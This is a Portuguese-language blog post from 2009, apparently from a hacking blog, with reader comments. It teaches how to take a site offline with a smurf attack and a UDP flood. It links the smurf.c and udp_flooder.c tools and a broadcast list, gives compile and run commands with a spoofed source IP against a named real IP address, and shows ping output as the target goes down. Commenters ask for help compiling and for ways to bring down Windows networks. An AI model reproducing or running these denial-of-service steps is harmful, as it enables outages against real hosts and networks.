Tutorial smurf, tutorial udp flood, atacar com smurf no linux, atacar com udp flood no linux ou windows,derrubar site usando smurf

Publicado: outubro 13, 2009 em ataques, normal
Tags:, , , ,

Este tutorial demostrará, como derrubar um alvo, com smurf.

ATAQUE DE SMURF,  EXEMPLO:  é enviado um broadcast para diversos enderecos de ip e o endereco de origem(que deveria ser o IP de quem enviou) é modificado para o da vitima. O resultado si dará que: todas as maquinas mandarao milhares de unicasts para o pobre coitado.
Para realizarmos esses nossos ataque, precisamos de 3  instrumentos:
Um Broadcast.txt (Uma lista com centenas de Ips) Abaixo está o link de uma lista de ips como exemplo.
http://www.4shared.com/file/118011308/b … dcast.html

Precisamos do programa smurf.c
http://www.4shared.com/file/118010956/9 … smurf.html

Udp_flooder.c
http://www.4shared.com/file/118010966/b … ooder.html

AGORA QUE JÁ TEMOS AS FERRAMENTAS PARA ATAQUE, agora o que temos que fazer é o ataque.
Depois de baixar as ferramentas nós temos que compila-las.
Compilando o smurf.c:
# sudo gcc smurf.c -o smurf
#
OBS: Isso é um tutorial feito com linux, porem si quiser usar windows, é sem problemas. Basta você compilar o programa usando o próprio c++.
Compilando o udp_flooder.c:
# sudo gcc udp_flooder.c -o udp_flooder
#

OBS: Para continuar daqui pra frente você precisa se tornar root.

Executando o smurf:
# ./smurf

usage: ./smurf <alvo> <list_ips> <numero de  packets> <packet delay> <packet tamanho>

target = endereço para atacar(ALVO)
bcast file = arquivo com os endereços de broadcast(lista de ips)
num packets = número de pacotes para enviar (0 = flood)
packet delay = espera entre cada pacote (em ms)
packet size = tamanho do pacote (<102)

O comando que irei utilizar para atacar sera este abaixo:
# ./smurf 200.140.161.201 broadcast.txt 0 0 1024

|=====================================|
| Atacando o alvo |
|=====================================|

Antes de atacar o alvo, eu vou dar um “Ping” para ver se ele esta “ON”:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=123 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=102 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=101 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=108 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=102 ms
^C
— 200.140.161.201 ping statistics —
6 packets transmitted, 6 received, 0% packet loss, time 5006ms

Esta “ON”, agora vou executar o comando para atacar:

# ./smurf 200.140.161.201 broadcast.txt 0 0 1024

smurf.c v4.0 by TFreak

Flooding 200.140.161.201 (. = 25 outgoing packets)
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………

Depois de alguns minutos, vamos pingar o alvo novamente para ver se ele continua “ON”:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=120 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=114 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=104 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=114 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=103 ms

— 200.140.161.201 ping statistics —
28 packets transmitted, 5 received, 82% packet loss, time 27086ms

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.

— 200.140.161.201 ping statistics —
5 packets transmitted, 0 received, 100% packet loss, time 3999ms

Pronto, o alvo esta “OFF”.

(DICA: quanto maior a lista de “broadcast” mais eficiente sera o seu ataque.
_________________________________________________________________
Agora vamos utilizar o udp_flooder.

Para executa-lo:
# ./udp_flooder

[=] + ===========[####]============ + [=]
*** Emperial Flooder[UDP] ***
XxX VIPER CORP GROUP XxX
<-> Underground Max <->
[=] + ==========[####]============ + [=]

Uso: ./udp_flooder <IP_Spoof> <Vitima> <Port_origem> <Port_Destino> <msg> <num_msgs>

O comando que irei utilizar para atacar sera este abaixo:
./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000

Obs: Para que você obtenha bons resultados, este comando precisara ser executado varias vezes consecutivas

Vamos “pingar” o host alvo:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=130 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=118 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=126 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=105 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=129 ms

— 200.140.161.201 ping statistics —
6 packets transmitted, 6 received, 0% packet loss, time 5008ms

Agora vamos atacar:
# ./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000

— Estatisticas e infos do ataque ————-

Total de bytes enviados: [31000000]
—————————————-

Depois de executar o comando varias vezes consecutivas, vamos ver o resultado:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.

— 200.140.161.201 ping statistics —
15 packets transmitted, 0 received, 100% packet loss, time 14112ms

Como podem ver o alvo ficou “OFF”.

Em caso de duvidas pergunte para mim aqui no blog que eu responderei.
O autor original deste tutorial foi o: Dreamexplo

~bye~ Juancarloscunha

comentários
  1. Lammer Profissional disse:

    Entao…Voce nao poderia postar um flood com headers para windows? esse smurf/udp nao simplesmente “funciona” com c++ no windows…

  2. Anónimo disse:

    Primeiramente ainda bem que é para linux, mas tenho uma dúvida, é normal eu ficar sem conexão a internet quando ataco com o smurf ?

    []’s

  3. Wemerson Guimarães disse:

    Amigo, boa noite.

    Fui fazer um teste com o ubuntu 6.06LTS… fiz todas as atualizações e instalei o gcc corretamente…

    Mas quando vou compilar tá dando um monte de mensagens de erro…

    Sabe dizer quais as dependências que devo atualizar antes?

  4. fabiano disse:

    Sim rapaz… os pacotes estão saido de sua máquina.. seria bom fazer de outro host.
    Abraços.

  5. fabiano disse:

    Sim rapaz… os pacotes estão saindo de sua máquina.. seria bom fazer de outro host que possua uma boa largura de banda….
    [ ] ´s !

  6. Lucas disse:

    Digito o comando: sudo gcc smurf.c -o smurf
    Apenas aparece a mensagem:
    GCC: SMURF.C: NO SUCH FILE OR DIRECTORY

    meu aquivo smurf.c está instalado na area de trabalho, alguma dica ?

  7. Lucas disse:

    Alguem pode dar uma força ai ?

    • matheusSL6 disse:

      Cara e pq o arquivo nao esta na pasta certa voce tem que navegar ate a pasta correta
      Ex. o smurf.c esta em Downloads ai voce vai no terminal e digita cd Downloads
      ai digita gcc smurf.c -o surmf

  8. franklin disse:

    Pó não da eu não posso usa esse programa no windows mas como eu vou derruba uma rede de pcs que usam o windows não da como faço isso ai funciona no windows.
    por favor em ajuda preciso muito disso

  9. franklin disse:

    falo aqui que deu erro aqui o
    void smurf(int, struct sockaddr_in, u_long, int);
    acho que porque aqui é windows 7 e eu tenho o c++ por isso não entendi porque deu erro

  10. H.D-K disse:

    Não consegui compilar man “/

  11. kevin disse:

    lol o do udp_flooder funciono bem, mas o do smurf a net cai ai tem que desliga o pc e liga novamente… alguem pode me da uma luz sobre isso? abrass

  12. alan disse:

    Olá, muito bom o tópico. Mais gostaria de saber se vcs sabem como se proteger ou pelomenos amenizar contra estes ataques.. ?

    Já tentei muitas coisas, e nem proquear o IP do atacante funciona, já tentei fechar toda a entrada e a saida, mais nada funciona

    Podem me ajudar ?

    Obrigado

  13. Tiago disse:

    Pois é , o problema é que a internet para de funcionar quando executo, é normal? pois nao consigo verificar se o site caiu ou não … deixe uns 2 min só o terminal com o codigo rodando, e quando parei o codigo e entrei no site, ele não tinha caido, será que demora mais tempo?

  14. telly disse:

    telly_telecom alguem me ajuda ? skype

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s